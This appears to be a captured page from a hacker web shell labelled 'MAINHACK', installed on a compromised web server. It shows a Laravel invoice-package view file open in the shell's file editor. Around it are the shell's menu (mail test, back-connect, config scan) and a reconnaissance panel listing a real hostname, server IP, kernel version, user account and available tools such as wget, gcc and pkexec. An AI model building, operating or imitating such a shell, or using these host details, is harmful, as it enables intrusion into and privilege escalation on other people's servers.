[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 43a0934a207176bbb249177189acaab9.php
<?php $__env->startSection('content'); ?> <div class="row"> <div class="col-lg-8 offset-lg-2"> <div class="card"> <div class="card-header"> <span class="panel-title"><?php echo e(_lang('Package Details')); ?></span> </div> <div class="card-body"> <table class="table table-bordered"> <tr><td><?php echo e(_lang('Pasckage Name')); ?></td><td><?php echo e($package->name); ?></td></tr> <tr><td><?php echo e(_lang('Package Type')); ?></td><td><?php echo e(ucwords($package->package_type)); ?></td></tr> <tr><td><?php echo e(_lang('Cost')); ?></td><td><?php echo e(decimalPlace($package->cost, currency_symbol())); ?></td></tr> <tr><td><?php echo e(_lang('Status')); ?></td><td><?php echo xss_clean(status($package->status)); ?></td></tr> <tr> <td><?php echo e(_lang('Is Popular')); ?></td> <td> <?php if($package->is_popular == 1): ?> <?php echo xss_clean(show_status(_lang('Yes'), 'success')); ?> <?php else: ?> <?php echo xss_clean(show_status(_lang('No'), 'danger')); ?> <?php endif; ?> </td> </tr> <tr><td><?php echo e(_lang('Discount')); ?></td><td><?php echo e($package->discount); ?> %</td></tr> <tr><td><?php echo e(_lang('Trial Days')); ?></td><td><?php echo e($package->trial_days); ?></td></tr> <tr><td><?php echo e(_lang('User Limit')); ?></td><td><?php echo e($package->user_limit != '-1' ? $package->user_limit : _lang('Unlimited')); ?></td></tr> <tr><td><?php echo e(_lang('Invoice Limit')); ?></td><td><?php echo e($package->invoice_limit != '-1' ? $package->invoice_limit : _lang('Unlimited')); ?></td></tr> <tr><td><?php echo e(_lang('Quotation Limit')); ?></td><td><?php echo e($package->quotation_limit != '-1' ? $package->quotation_limit : _lang('Unlimited')); ?></td></tr> <tr> <td><?php echo e(_lang('Recurring Invoice')); ?></td> <td> <?php if($package->recurring_invoice == 1): ?> <?php echo xss_clean(show_status(_lang('Yes'), 'success')); ?> <?php else: ?> <?php echo xss_clean(show_status(_lang('No'), 'danger')); ?> <?php endif; ?> </td> </tr> <tr><td><?php echo e(_lang('Customer Limit')); ?></td><td><?php echo e($package->customer_limit != '-1' ? $package->customer_limit : _lang('Unlimited')); ?></td></tr> <tr><td><?php echo e(_lang('Business Limit')); ?></td><td><?php echo e($package->business_limit != '-1' ? $package->business_limit : _lang('Unlimited')); ?></td></tr> <tr> <td><?php echo e(_lang('Invoice Template Maker')); ?></td> <td> <?php if($package->invoice_builder == 1): ?> <?php echo xss_clean(show_status(_lang('Yes'), 'success')); ?> <?php else: ?> <?php echo xss_clean(show_status(_lang('No'), 'danger')); ?> <?php endif; ?> </td> </tr> <tr> <td><?php echo e(_lang('Online Invoice Payment')); ?></td> <td> <?php if($package->online_invoice_payment == 1): ?> <?php echo xss_clean(show_status(_lang('Yes'), 'success')); ?> <?php else: ?> <?php echo xss_clean(show_status(_lang('No'), 'danger')); ?> <?php endif; ?> </td> </tr> <tr> <td><?php echo e(_lang('HR & Payroll Module')); ?></td> <td> <?php if($package->payroll_module == 1): ?> <?php echo xss_clean(show_status(_lang('Yes'), 'success')); ?> <?php else: ?> <?php echo xss_clean(show_status(_lang('No'), 'danger')); ?> <?php endif; ?> </td> </tr> </table> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/public_html/resources/views/backend/admin/package/view.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.97 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002